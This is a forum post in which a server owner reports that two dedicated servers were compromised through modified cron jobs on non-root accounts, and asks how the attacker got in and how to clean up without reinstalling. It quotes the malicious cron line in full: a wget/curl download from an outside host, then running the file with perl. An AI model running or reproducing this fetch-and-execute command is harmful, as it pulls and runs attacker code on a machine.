I've got two dedicated servers that some days ago started to send me notifications about unknown cron jobs running.
On both servers I've got secondary accounts for my websites and the hacker has modified the cron job for those accounts, not for root. So I think "maybe" they have only got limited access.
Both are trying to run the following: cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*
Cronjob output from first server:
http://pastebin.com/m56ga6pp
Cronjob output from second server:
http://pastebin.com/4utZ8agC
The weird thing is that both servers seem hacked at the same time and by using the same method.
Did anyone had exactly this kind of hack that can give me ideas on how did he got in and if I can remove it without reinstalling..?
There are plenty of websites on the servers, and the first one uses about 500GB that would take a lot to move somewhere else and reinstall.
Thanks in advance!